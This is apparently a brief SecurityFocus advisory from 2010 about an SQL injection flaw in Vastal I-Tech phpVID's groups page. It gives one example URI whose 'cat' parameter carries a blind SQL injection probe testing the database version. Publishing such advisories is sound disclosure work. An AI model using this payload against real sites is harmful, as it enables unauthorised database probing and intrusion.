Vastal I-Tech phpVID 'group.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4


 

Privacy Statement
Copyright 2010, SecurityFocus